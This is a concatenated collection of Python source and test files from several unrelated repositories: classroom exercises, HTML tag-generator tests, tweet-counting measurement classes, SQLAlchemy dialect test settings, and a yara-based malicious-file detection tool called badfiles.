fl = FileList(directory)
rescan_output_dict = fl.rescan()
rescan_output = f'<pre>{json.dumps(rescan_output_dict, indent = 4)}</pre>'
print(f'JSON Output is:\n\n {rescan_output}')
result = '<h3>Rescanning the following directory using the pickled ' \
f'"FileList" file on disk:</h3>{directory}<br><br>' + \
'<h3>Changes/Addition/Deletions JSON Output:</h3>' \
f'{rescan_output}'
return result
def main():
"""Main function for web app"""
app.run(debug=True, port=5000)
if __name__ == "__main__":
main()
```
#### File: python_class_2021_B2/exercise_2/solution.py
```python
class Item(object):
def __init__(self, quantity, measure, name, price):
self.quantity = quantity
self.measure = measure
self.name = name
self.price = price
def __iter__(self):
return iter((self.quantity, self.measure, self.name, self.price))
class Cart(object):
def __init__(self):
self.cart_list = []
def add(self, cart_item):
self.cart_list.append(cart_item)
def __format__(self, format):
tmp_str = ''
tmp_list = []
if (format == 'short'):
for value in self.cart_list:
tmp_list.append(value.name)
tmp_str = ', '.join(tmp_list)
elif (format == 'long'):
for value in self.cart_list:
tmp_str += f"{value.quantity:5} {value.measure:10}" \
f"{value.name} @ ${value.price:.2f}..." \
f"${value.quantity*value.price:.2f}\n"
return tmp_str
cart = Cart()
cart.add(Item(1, 'hardcover', 'book', 30))
cart.add(Item(2, 'tube', 'toothpaste', 4))
cart.add(Item(5, 'silver', 'spoon', 5))
cart.add(Item(2.5, 'boxes', 'apples', 5))
print(f"\nYour cart contains: {cart:short}\n")
print(f"Your cart:\n{cart:long}")
```
#### File: python_class_2021_B2/exercise_3/test_solution.py
```python
from solution import count_words_sequential, count_words_threading
def test_non_threaded_empty_dir(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
assert 0 == count_words_sequential(str(test_directory / '*.txt'))
def test_non_threaded_dirname(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
test_subdir = test_directory / 'subdir'
test_subdir.mkdir()
assert 0 == count_words_sequential(str(test_directory / '*d*'))
def test_non_threaded_one_empty_file(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
with open(test_directory / f'mytestfile.txt', 'w') as f:
f.write('')
assert 0 == count_words_sequential(str(test_directory / '*.txt'))
def test_non_threaded_five(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
s = 'abc def ghi jkl mno'
for filename in ['abc', 'def', 'ghi']:
with open(test_directory / f'{filename}.txt', 'w') as f:
f.write(s)
assert 15 == count_words_sequential(str(test_directory / '*.txt'))
def test_threaded_empty_dir(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
assert 0 == count_words_threading(str(test_directory / '*.txt'))
def test_threaded_dirname(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
test_subdir = test_directory / 'subdir'
test_subdir.mkdir()
assert 0 == count_words_threading(str(test_directory / '*d*'))
def test_threaded_one_empty_file(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
with open(test_directory / f'mytestfile.txt', 'w') as f:
f.write('')
assert 0 == count_words_threading(str(test_directory / '*.txt'))
def test_threaded_five(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
s = 'abc def ghi jkl mno'
for filename in ['abc', 'def', 'ghi']:
with open(test_directory / f'{filename}.txt', 'w') as f:
f.write(s)
assert 15 == count_words_threading(str(test_directory / '*.txt'))
```
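The solution.py module exercised by these tests is not included in this dump. A minimal sketch that would satisfy them, assuming a helper named count_words_in_file and a ThreadPoolExecutor for the threaded variant (both are assumptions, not the author's code), might look like:
```python
import glob
import os
from concurrent.futures import ThreadPoolExecutor

def count_words_in_file(path):
    """Count whitespace-separated words in a single file."""
    with open(path) as f:
        return len(f.read().split())

def count_words_sequential(pattern):
    """Count words across all files matching the glob pattern, one at a time."""
    return sum(count_words_in_file(p) for p in glob.glob(pattern)
               if os.path.isfile(p))

def count_words_threading(pattern):
    """Count words across all matching files, one worker thread per file."""
    paths = [p for p in glob.glob(pattern) if os.path.isfile(p)]
    if not paths:
        return 0
    with ThreadPoolExecutor() as pool:
        return sum(pool.map(count_words_in_file, paths))
```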
#### File: python_class_2021_B2/exercise_5/solution.py
```python
import argparse
import textwrap
def main():
"""Main function for headtail program"""
###Configure command line options using argparse
parser = argparse.ArgumentParser(formatter_class=\
argparse.RawTextHelpFormatter)
parser.add_argument('--start', '-s', nargs='?', const=1, type=int, default=3)
parser.add_argument('--end', '-e', nargs='?', const=1, type=int, default=3)
parser.add_argument('filename', nargs='+', help=textwrap.dedent('''
NOTES:
- Enter the positional required argument "filename". You can enter the name
of an existing file in the current directory, or "tmpfile" which is
auto-generated with a default of 100 lines.
- Enter the optional argument for the number of lines to print from the
beginning (head) of the file (-s <int> or --start <int>).
- Enter the optional argument for the number of lines to print from the
end (tail) of the file (-e <int> or --end <int>).
- For example: ./solution.py tmpfile -s 2 -e 2
OR
./solution.py tmpfile
- If no value is given for --start and/or --end, a default of 3 will be used.
- Use -h or --help for help info as noted above.'''))
args = parser.parse_args()
### Create a file to parse head and tail lines from
num_lines = 100
cntr = 1
print(f'\nCreating a file with {num_lines} lines called "tmpfile" in the '
'local directory...')
with open('./tmpfile', 'w+') as fh:
while cntr <= num_lines:
if cntr == 100:
fh.write(f'line_{cntr}')
else:
fh.write(f'line_{cntr}\n')
cntr += 1
### Determine lines in existing local file supplied as an arg instead of
### the auto-generated "tmpfile"
if args.filename[0] != 'tmpfile':
with open(args.filename[0], 'r') as fh:
file_list = fh.readlines()
num_lines = len(file_list)
    ### Determine number of lines requested from start and end arguments and
    ### print them from the file if there are enough lines. Otherwise,
    ### error out.
if args.start + args.end <= num_lines:
print(f'\nPrinting {args.start} line(s) from head and {args.end} line(s)'
f' from tail of the "{args.filename[0]}" file.\nUsing the -s and '
'-e arguments value, or the default value "3" if either was not '
'given...\n')
with open(args.filename[0], 'r') as fh:
file_list = fh.readlines()
for index,value in enumerate(file_list):
value = value.replace('\n', '')
file_list[index] = value
head_list = file_list[:args.start]
tail_list = file_list[-args.end:]
for value in head_list:
print(value)
print('...')
for value in tail_list:
print(value)
print('\n')
else:
raise ValueError(f'\n\nCannot print {args.start + args.end} lines from a file with {num_lines} lines.\n\nExiting!!\n')
if __name__ == '__main__':
main()
```
#### File: python_class_2021_B2/exercise_8/solution.py
```python
import unicodedata
def str_range(start, end, *args):
"""Function to mimic range function in standar python library. Both start
and end values are mandatory, step value as the third arg is optional. The
step value must be an int (positive or negative) and not 0 or 1, otherwise
    a TypeError exception is raised."""
step_val = 1
if len(args) == 1 and isinstance(args[0], int) \
and (args[0] != 0 and args[0] != 1):
step_val = args[0]
elif len(args) == 0:
pass
else:
        raise TypeError('No more than 3 args can be supplied to str_range, and 3rd arg must be a non-zero "int" and not "1"')
# Get the normalized int value for the character from the unicodedata module
start_num = [ord(c) for c in unicodedata.normalize('NFC', start)]
end_num = [ord(c) for c in unicodedata.normalize('NFC', end)]
    # Determine the number of chars between the start and end args (including the
# start and end chars) and the step_val arg (if supplied)
if step_val % 2 == 0:
length = abs(int((abs(start_num[0] - end_num[0]) + 2) / step_val))
else:
length = abs(int((abs(start_num[0] - end_num[0]) + 1) / step_val))
if step_val > length:
raise TypeError('Step value cannot be greater than the cardinality of the chars between start char and end char')
counter = 0
char_str = ''
while counter < length:
char_str += chr(start_num[0] + step_val * counter)
counter += 1
print(char_str)
return(iter(char_str))
## prints: a
str_range('a', 'a')
## prints: ace
str_range('a', 'f', 2)
## prints: ac
str_range('a', 'c', 2)
## prints: ca
str_range('c', 'a', -2)
## prints: TypeError: Step value cannot be greater than the cardinality of the
## chars between start char and end char
#str_range('c', 'a', 3) #Commenting out for pytest. Uncomment to test standalone
```
#### File: python_class_2021_B2/exercise_8/test_solution.py
```python
from solution import str_range
def test_same_start_end():
r = str_range('a', 'a')
assert iter(r) == r
assert ''.join(list(r)) == 'a'
def test_simple():
r = str_range('a', 'c')
assert ''.join(list(r)) == 'abc'
def test_simple_with_step():
r = str_range('a', 'c', 2)
assert ''.join(list(r)) == 'ac'
def test_simple_with_negativestep():
r = str_range('c', 'a', -2)
assert ''.join(list(r)) == 'ca'
def test_hebrew():
r = str_range('א', 'ז', 2)
assert ''.join(list(r)) == 'אגהז'
```
|
{
"source": "jeffa/HTML-Auto-python",
"score": 3
}
|
#### File: HTML-Auto-python/t/02-tags.py
```python
import unittest
from HTML.Auto import Tag
from HTML.Auto import Attr
class TestTags(unittest.TestCase):
def test_init(self):
auto = Tag()
self.assertEqual( auto.encode, 0, "no args encode correct" )
self.assertEqual( auto.encodes, '', "no args encodes correct" )
self.assertEqual( auto.indent, '', "no args indent correct" )
self.assertEqual( auto.level, 0, "no args level correct" )
self.assertEqual( auto.sort, 0, "no args sort correct" )
self.assertEqual( auto.newline, '', "no args newline correct" )
auto = Tag({ 'encodes': '<>', 'indent': ' ', 'sort': 1, 'level': 2 })
#self.assertEqual( auto.encode, 1, "encode set correct" )
self.assertEqual( auto.encodes, '<>', "encodes set correct" )
self.assertEqual( auto.indent, ' ', "indent set correct" )
        self.assertEqual( auto.level, 2, "level set correct" )
self.assertEqual( auto.sort, 1, "sort set correct" )
self.assertEqual( auto.newline, "\n", "newline set correct" )
def test_empty(self):
auto = Tag()
self.assertEqual( auto.tag( { 'tag': 'html' } ), '<html />', "no cdata correct" )
self.assertEqual( auto.tag( { 'tag': 'html', 'cdata': '' } ), '<html />', "empty cdata correct" )
def test_empty_attr(self):
auto = Tag()
self.assertEqual( auto.tag( { 'tag': 'foo', 'attr': { 'bar': 'qux' } } ), '<foo bar="qux" />', "no cdata with attr correct" )
self.assertEqual( auto.tag( { 'tag': 'foo', 'cdata': '', 'attr': { 'bar': 'qux' } } ), '<foo bar="qux" />', "empty cdata with attr correct" )
def test_nonempty(self):
auto = Tag()
self.assertEqual( auto.tag( { 'tag': 'p', 'cdata': 0 } ), '<p>0</p>', "0 (int) as cdata" )
self.assertEqual( auto.tag( { 'tag': 'p', 'cdata': '0' } ), '<p>0</p>', "0 (str) as cdata" )
self.assertEqual( auto.tag( { 'tag': 'html', 'cdata': ' ' } ), '<html> </html>', "whitespace cdata correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': '1' } }), '<ol><li>1</li></ol>', "ol tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1 }, { 'tag': 'li', 'cdata': 2 }] }), '<ol><li>1</li><li>2</li></ol>', "ol tag correct" )
def test_nonempty_attr(self):
auto = Tag()
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': '1' }, 'attr': { 'class': 'ordered' } }), '<ol class="ordered"><li>1</li></ol>', "ol tag correct" )
attr = { 'class': [ 'odd', 'even' ] }
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1, 'attr': attr }, { 'tag': 'li', 'cdata': 2, 'attr': attr }] }), '<ol><li class="odd">1</li><li class="even">2</li></ol>', "ol tag correct" )
def test_indent(self):
auto = Tag({ 'indent': ' ' })
self.assertEqual( auto.tag({ 'tag': 'p', 'cdata': 0 }), "<p>0</p>\n", "paragraph tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': 1 } }), "<ol>\n <li>1</li>\n</ol>\n", "ol tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1 }, { 'tag': 'li', 'cdata': 2 }] }), "<ol>\n <li>1</li>\n <li>2</li>\n</ol>\n", "ol tag correct" )
def test_level(self):
auto = Tag({ 'indent': ' ', 'level': 3 })
self.assertEqual( auto.tag({ 'tag': 'p', 'cdata': 0 }), " <p>0</p>\n", "paragraph tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': { 'tag': 'li', 'cdata': 1 } }), " <ol>\n <li>1</li>\n </ol>\n", "ol tag correct" )
self.assertEqual( auto.tag({ 'tag': 'ol', 'cdata': [{ 'tag': 'li', 'cdata': 1 }, { 'tag': 'li', 'cdata': 2 }] }), " <ol>\n <li>1</li>\n <li>2</li>\n </ol>\n", "ol tag correct" )
if __name__ == '__main__':
unittest.main()
```
#### File: HTML-Auto-python/t/04-tag-attrs.py
```python
import unittest
from HTML.Auto import Tag
class TestTagAttrs(unittest.TestCase):
def test_simple(self):
auto = Tag()
self.assertEqual(
'<p class="paragraph" />',
auto.tag( { 'tag': 'p', 'attr': { 'class': 'paragraph' } } ),
'empty paragraph tag correct'
)
self.assertEqual(
'<p class="paragraph">0</p>',
auto.tag( { 'tag': 'p', 'attr': { 'class': 'paragraph' }, 'cdata': 0 } ),
'paragraph tag correct'
)
self.assertEqual(
'<colgroup span="0">0</colgroup>',
auto.tag( { 'tag': 'colgroup', 'attr': { 'span': 0 }, 'cdata': 0 } ),
'colgroup tag correct'
)
self.assertEqual(
'<colgroup span="3"><col /></colgroup>',
auto.tag( {'attr': {'span': 3}, 'cdata': [{'attr': {}, 'tag': 'col'}], 'tag': 'colgroup'} ),
'colgroup tag correct'
)
self.assertEqual(
'<colgroup span="3"><col /><col /></colgroup>',
auto.tag( {'attr': {'span': 3}, 'cdata': [{'attr': {}, 'tag': 'col'},{'attr': {}, 'tag': 'col'}], 'tag': 'colgroup'} ),
'colgroup tag correct'
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup></table>',
auto.tag({ 'tag': 'table', 'cdata': [
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}] },
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}] },
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}] } ] }),
'colgroup tag correct'
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
auto.tag({ 'tag': 'table', 'cdata': [
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}]},
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}]},
{'tag': 'colgroup', 'attr': {}, 'cdata': [{'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}, {'tag': 'col', 'attr': {}}]},
{'tag': 'tr', 'attr': {}, 'cdata': [{'tag': 'th', 'attr': {}, 'cdata': 'a'}, {'tag': 'th', 'attr': {}, 'cdata': 'b'}, {'tag': 'th', 'attr': {}, 'cdata': 'c'}]},
{'tag': 'tr', 'attr': {}, 'cdata': [{'tag': 'td', 'attr': {}, 'cdata': '1'}, {'tag': 'td', 'attr': {}, 'cdata': '2'}, {'tag': 'td', 'attr': {}, 'cdata': '3'}]},
{'tag': 'tr', 'attr': {}, 'cdata': [{'tag': 'td', 'attr': {}, 'cdata': '4'}, {'tag': 'td', 'attr': {}, 'cdata': '5'}, {'tag': 'td', 'attr': {}, 'cdata': '6'}]}
] }),
'colgroup tag correct'
)
if __name__ == '__main__':
unittest.main()
```
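For reference, the Tag interface exercised by these tests can be driven directly as below; the calls and expected output are taken from test_nonempty and test_indent above, so nothing here goes beyond what the tests already assert.
```python
from HTML.Auto import Tag

# Compact output: no indentation, everything on one line
auto = Tag()
print(auto.tag({'tag': 'ol', 'cdata': [{'tag': 'li', 'cdata': 1},
                                       {'tag': 'li', 'cdata': 2}]}))
# <ol><li>1</li><li>2</li></ol>

# Pretty-printed output: one-space indent, nested tags on their own lines
pretty = Tag({'indent': ' '})
print(pretty.tag({'tag': 'ol', 'cdata': {'tag': 'li', 'cdata': 1}}))
# <ol>
#  <li>1</li>
# </ol>
```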
|
{
"source": "jeffakolb/Gnip-Analysis-Pipeline",
"score": 3
}
|
#### File: Gnip-Analysis-Pipeline/example/my_measurements.py
```python
class TweetCounter(object):
def __init__(self, **kwargs):
self.counter = 0
def add_tweet(self,tweet):
self.counter += 1
def get(self):
return [(self.counter,self.get_name())]
def get_name(self):
return 'TweetCounter'
def combine(self,new):
self.counter += new.counter
class ReTweetCounter(object):
def __init__(self, **kwargs):
self.counter = 0
def add_tweet(self,tweet):
if tweet['verb'] == 'share':
self.counter += 1
def get(self):
return [(self.counter,self.get_name())]
def get_name(self):
return 'ReTweetCounter'
def combine(self,new):
self.counter += new.counter
measurement_class_list = [TweetCounter, ReTweetCounter]
```
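These measurement classes share an informal interface (add_tweet, get, get_name, combine) that the pipeline drives for each tweet. A hypothetical standalone driver, using made-up tweet dicts rather than real Gnip activity-streams records, would look like:
```python
from my_measurements import measurement_class_list

# hypothetical tweets; the real pipeline feeds Gnip activity-streams records
tweets = [
    {'verb': 'post', 'body': 'hello'},
    {'verb': 'share', 'body': 'RT hello'},
]

measurements = [cls() for cls in measurement_class_list]
for tweet in tweets:
    for m in measurements:
        m.add_tweet(tweet)

for m in measurements:
    print(m.get())  # [(2, 'TweetCounter')] then [(1, 'ReTweetCounter')]
```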
|
{
"source": "jeffakolb/Gnip-Filter-Optimization",
"score": 2
}
|
#### File: jeffakolb/Gnip-Filter-Optimization/metrics_lib.py
```python
import numpy
def precision(labeled_tweets):
return numpy.mean([tweet['LBLR_label'] for tweet in labeled_tweets])
setattr(precision,'metric_name','precision')
```
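precision() simply averages the binary LBLR_label field over a list of labeled tweets. A quick illustration with made-up labels:
```python
from metrics_lib import precision

# hypothetical labeled tweets; 1 = relevant, 0 = not relevant
labeled_tweets = [
    {'LBLR_label': 1},
    {'LBLR_label': 0},
    {'LBLR_label': 1},
    {'LBLR_label': 1},
]
print(precision.metric_name)      # precision
print(precision(labeled_tweets))  # 0.75
```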
|
{
"source": "jeffalbion/sqlalchemy-sqlany",
"score": 2
}
|
#### File: sqlalchemy-sqlany/test/requirements.py
```python
from sqlalchemy.testing.requirements import SuiteRequirements
from sqlalchemy.testing import exclusions
class Requirements(SuiteRequirements):
@property
def intersect(self):
return exclusions.open()
@property
def except_(self):
return exclusions.open()
@property
def window_functions(self):
return exclusions.open()
@property
def views(self):
return exclusions.open()
@property
def reflects_pk_names(self):
return exclusions.open()
@property
def datetime(self):
"""target dialect supports representation of Python
datetime.datetime() objects."""
return exclusions.closed()
@property
def datetime_microseconds(self):
"""target dialect supports representation of Python
datetime.datetime() with microsecond objects."""
return exclusions.closed()
@property
def datetime_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1900) values."""
return exclusions.closed()
@property
def date(self):
"""target dialect supports representation of Python
datetime.date() objects."""
return exclusions.closed()
@property
def date_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1900) values."""
return exclusions.closed()
@property
def time(self):
"""target dialect supports representation of Python
datetime.time() objects."""
return exclusions.closed()
@property
def time_microseconds(self):
"""target dialect supports representation of Python
datetime.time() with microsecond objects."""
return exclusions.closed()
@property
def order_by_col_from_union(self):
"""target database supports ordering by a column from a SELECT
inside of a UNION
E.g. (SELECT id, ...) UNION (SELECT id, ...) ORDER BY id
"""
return exclusions.closed()
@property
def cross_schema_fk_reflection(self):
"""target system must support reflection of inter-schema foreign keys
"""
return exclusions.closed()
@property
def independent_connections(self):
"""target system must support simultaneous, independent database connections.
"""
return exclusions.open()
@property
def temp_table_reflection(self):
return exclusions.closed()
@property
def implicitly_named_constraints(self):
return exclusions.open()
@property
def unique_constraint_reflection(self):
return exclusions.closed()
@property
def floats_to_four_decimals(self):
return exclusions.closed()
@property
def precision_generic_float_type(self):
return exclusions.closed()
```
#### File: sqlalchemy-sqlany/test/test_suite.py
```python
from sqlalchemy.testing.suite import *
from sqlalchemy.testing.suite import ComponentReflectionTest as _ComponentReflectionTest
from sqlalchemy.testing.suite import InsertBehaviorTest as _InsertBehaviorTest
from sqlalchemy.testing.suite import LimitOffsetTest as _LimitOffsetTest
from sqlalchemy.testing.suite import RowFetchTest as _RowFetchTest
from sqlalchemy.testing.suite import TextTest as _TextTest
from sqlalchemy.testing.suite import UnicodeTextTest as _UnicodeTextTest
from sqlalchemy.testing.suite import StringTest as _StringTest
from sqlalchemy.testing.suite import UnicodeVarcharTest as _UnicodeVarcharTest
class ComponentReflectionTest(_ComponentReflectionTest):
""" Temporary tables need to use 'GLOBAL TEMPORARY' or 'LOCAL TEMPORARY'
in SQL Anywhere
"""
@classmethod
def define_temp_tables(cls, metadata):
kw = {
'prefixes': ["GLOBAL TEMPORARY"],
}
user_tmp = Table(
"user_tmp", metadata,
Column("id", sa.INT, primary_key=True),
Column('name', sa.VARCHAR(50)),
Column('foo', sa.INT),
sa.UniqueConstraint('name', name='user_tmp_uq'),
sa.Index("user_tmp_ix", "foo"),
**kw
)
if testing.requires.view_reflection.enabled and \
testing.requires.temporary_views.enabled:
event.listen(
user_tmp, "after_create",
DDL("create temporary view user_tmp_v as "
"select * from user_tmp")
)
event.listen(
user_tmp, "before_drop",
DDL("drop view user_tmp_v")
)
class InsertBehaviorTest(_InsertBehaviorTest):
def test_insert_from_select_with_defaults( self ):
pass
class LimitOffsetTest(_LimitOffsetTest):
def test_bound_limit( self ):
pass
def test_bound_limit_offset( self ):
pass
def test_bound_offset( self ):
pass
class RowFetchTest(_RowFetchTest):
def test_row_w_scalar_select(self):
pass
class TextTest(_UnicodeTextTest):
def test_literal_backslashes(self):
pass
def test_literal(self):
pass
def test_round_trip(self):
pass
def test_round_trip_executemany(self):
pass
class UnicodeTextTest(_UnicodeTextTest):
def test_literal_backslashes(self):
pass
def test_literal(self):
pass
def test_round_trip(self):
pass
def test_round_trip_executemany(self):
pass
class StringTest(_StringTest):
def test_literal_backslashes(self):
pass
class UnicodeVarcharTest(_UnicodeVarcharTest):
def test_literal_backslashes(self):
pass
def test_literal(self):
pass
def test_round_trip(self):
pass
def test_round_trip_executemany(self):
pass
```
|
{
"source": "Jeffallan/badfiles",
"score": 2
}
|
#### File: badfiles/badfiles/badfiles.py
```python
import enum
import mimetypes
import os
import pathlib
import warnings
from collections import namedtuple
from dataclasses import dataclass
from enum import Enum
from os import PathLike
from typing import IO, Dict, ItemsView, List, Optional, Tuple
from zipfile import BadZipFile, LargeZipFile, Path, ZipFile
import magic
import yara # type: ignore
from badfiles.utils import DDE_CHECKS, RULE_DIR, find_dde, process_tar, unzip_doc # type: ignore
class Classification(Enum):
"""The results returned by the BadFile class
Attributes:
SAFE (str): Nothing malicious was detected.
UNSAFE (str): Malicious content was detected.
NOT_IMPLEMENTED (str): The file type has not been implemented in the detection engine.
UNKNOWN (str): The file type cannot be determined.
"""
SAFE = "safe"
UNSAFE = "unsafe"
NOT_IMPLEMENTED = "not implemented"
UNKNOWN = "unknown"
SAFE_MSG = "Nothing malicious was detected"
BadfileMsg = namedtuple("BadfileMsg", ["classification", "message", "file"])
@dataclass
class Badfile(object):
"""The class that implements the badfiles detection engine.
Attributes:
zip_rules (Optional[str]): The path to yara detection rules for zip files (defaults to ./rules/zip_rules.yara)
tar_rules (Optional[str]): The path to yara detection rules for tar files (defaults to ./rules/tar_rules.yara)
        csv_rules (Optional[str]): The path to yara detection rules for csv files (defaults to ./rules/csv_rules.yara)
"""
zip_rules: Optional[str] = str(pathlib.Path(RULE_DIR) / "rules/zip_rules.yara")
tar_rules: Optional[str] = str(pathlib.Path(RULE_DIR) / "rules/tar_rules.yara")
csv_rules: Optional[str] = str(pathlib.Path(RULE_DIR) / "rules/csv_rules.yara")
# gzip_rules: Optional[str] = None
# image_rules: Optional[str] = None
def __post_init__(self) -> None:
self.rules = dict()
for k, v in self.__dataclass_fields__.items(): # type: ignore
self.rules[k] = yara.compile(v.default) if v.default is not None else None
def _rule_factory(self, f: PathLike, mime: str) -> BadfileMsg:
m = f"{mime.split('/')[1].replace('x-', '')}_rules"
if m in self.rules.keys():
if self.rules[m] is None:
# warnings.warn("This mime type has not been implented.")
return BadfileMsg(
Classification.NOT_IMPLEMENTED.value,
"This mime type has not been implented.",
f,
)
return self._rule_match(self.rules[m], f, mime)
else:
# check for DDE
if mime in DDE_CHECKS:
match = self._rule_match(self.rules["zip_rules"], f, mime="application/zip")
if match.classification == "safe":
if find_dde(unzip_doc(f)):
return BadfileMsg(
Classification.UNSAFE.value,
"DDE detected",
pathlib.Path(f).name,
)
return match
return BadfileMsg(
Classification.UNKNOWN.value, f"Unrecognized mime type {mime}", pathlib.Path(f).name
)
def _rule_match(self, rules: yara.Rules, f: PathLike, mime: str):
hits: List = []
def cb(data):
# print(data, msg)
msg = BadfileMsg(
Classification.UNSAFE.value, data["meta"]["description"], pathlib.Path(f).name
)
yara.CALLBACK_ABORT
hits.append(msg)
if mime == "application/x-tar":
for t in process_tar(f):
rules.match(data=t, callback=cb, which_callbacks=yara.CALLBACK_MATCHES)
else:
rules.match(str(f), callback=cb, which_callbacks=yara.CALLBACK_MATCHES)
if len(hits) > 0:
return hits[0]
return BadfileMsg(Classification.SAFE.value, SAFE_MSG, pathlib.Path(f).name)
def _mime_type_confusion(self, f: PathLike) -> Tuple[bool, str, str]:
try:
confusion = (
mimetypes.guess_type(f, strict=True)[0].split("/")[1] # type: ignore
== magic.from_file(str(f), mime=True).split("/")[1],
magic.from_file(str(f), mime=True),
mimetypes.guess_type(f, strict=True)[0],
)
except AttributeError:
confusion = (False, "", "")
return confusion
def is_badfile(self, f: PathLike) -> BadfileMsg:
"""This function checks for various indicators of potentially malicious content including:
- Mime Type confusion;
        - Zip files with high compression rates; and
        - Hands f off to the proper yara detection rules.
Args:
f (PathLike): The path of the file to be analyzed
Returns:
BadfileMsg: The BadfileMsg named tuple
"""
is_mime_confusion = self._mime_type_confusion(f)
if is_mime_confusion[0] is False:
return BadfileMsg(
Classification.UNSAFE.value,
f"Deceptive extension. File extension suggests {is_mime_confusion[2]} inspection shows {is_mime_confusion[1]}",
pathlib.Path(f).name,
)
if is_mime_confusion[1] == "application/zip":
if self._high_compression(f):
return BadfileMsg(
Classification.UNSAFE.value, "high compression rate", pathlib.Path(f).name
)
return self._rule_factory(f, is_mime_confusion[1])
def _high_compression(self, f: PathLike, rate: float = 0.75) -> bool:
try:
zip_file = ZipFile(f)
except BadZipFile:
return False
stats = []
for z in zip_file.infolist():
try:
stats.append(1 - (z.compress_size / z.file_size))
except ZeroDivisionError:
return False
except LargeZipFile:
return True # TODO move LargeZipFile check to another function?
if len(stats) == 0:
return False
return sum(stats) / len(stats) > rate
def isolate_or_clear(
f: PathLike,
msg: BadfileMsg,
iso_dir: Optional[str] = None,
safe_dir: Optional[str] = None,
safe: List = ["safe"],
) -> None:
def _move_file(f: PathLike, msg: BadfileMsg, safe: List = safe) -> None:
if msg.classification in safe:
pathlib.Path(f).rename(pathlib.Path(safe_dir).resolve() / pathlib.Path(f).name)
else:
pathlib.Path(f).rename(pathlib.Path(iso_dir).resolve() / pathlib.Path(f).name)
try:
pathlib.Path(iso_dir).resolve().mkdir(parents=True)
pathlib.Path(safe_dir).resolve().mkdir(parents=True)
_move_file(f, msg)
except FileExistsError:
pathlib.Path(iso_dir).resolve()
pathlib.Path(safe_dir).resolve()
_move_file(f, msg)
except TypeError:
pass
```
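A minimal sketch of driving the engine directly, mirroring what cli.py below does through Gooey (the directory paths are placeholders, not part of the package):
```python
import pathlib
from badfiles.badfiles import Badfile, isolate_or_clear

bad = Badfile()  # use the yara rules bundled with the package

for path in pathlib.Path('./uploads').glob('**/*'):
    if not path.is_file():
        continue
    msg = bad.is_badfile(path)
    print(msg.classification, msg.message, msg.file)
    # move the file to an isolation or safe directory based on the verdict
    isolate_or_clear(path, msg, iso_dir='./isolated', safe_dir='./cleared')
```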
#### File: badfiles/badfiles/cli.py
```python
import pathlib
# import fire # type: ignore
from gooey import Gooey, GooeyParser # type: ignore
from badfiles.badfiles import Badfile, isolate_or_clear
@Gooey(
program_name="Badfiles",
program_description="A malicious file detection engine written with Python and Yara.",
default_size=(1200, 1200),
)
def main():
parser = GooeyParser(description="Badfiles")
target_group = parser.add_argument_group(
"Target", "Select either a file or directory to analyze."
)
target_group.add_argument(
"--file", widget="FileChooser", default=None, help="A file to analyze", required=False
)
target_group.add_argument(
"--dir", widget="DirChooser", default=None, help="A directory to analyze", required=False
)
disposition_group = parser.add_argument_group(
"Disposition", "Select directories to move badfiles and safe files."
)
disposition_group.add_argument(
"--iso_dir",
widget="DirChooser",
help="The directory to isolate badfiles.",
default=None,
required=False,
)
disposition_group.add_argument(
"--safe_dir",
widget="DirChooser",
help="The directory to store cleared files",
default=None,
required=False,
)
rule_group = parser.add_argument_group("Yara Rules", "Select custom Yara rules as desired.")
rule_group.add_argument(
"--zip_rules",
widget="FileChooser",
help="Path to zipfile rules.",
default=None,
required=False,
)
rule_group.add_argument(
"--tar_rules",
widget="FileChooser",
help="Path to tarfile rules",
default=None,
required=False,
)
rule_group.add_argument(
"--csv_rules",
widget="FileChooser",
help="Path to tarfile rules",
default=None,
required=False,
)
args = parser.parse_args()
bad = Badfile(
zip_rules=args.zip_rules,
tar_rules=args.tar_rules,
csv_rules=args.csv_rules,
# gzip_rules=args.gzip_rules,
# image_rules=args.image_rules
)
if args.file and args.dir:
raise ValueError("Analyzing both a single file and a directory is not supported.")
if not args.file and not args.dir:
raise ValueError("Naming either a single file or directory is required.")
if args.file:
f = bad.is_badfile(args.file)
print(f)
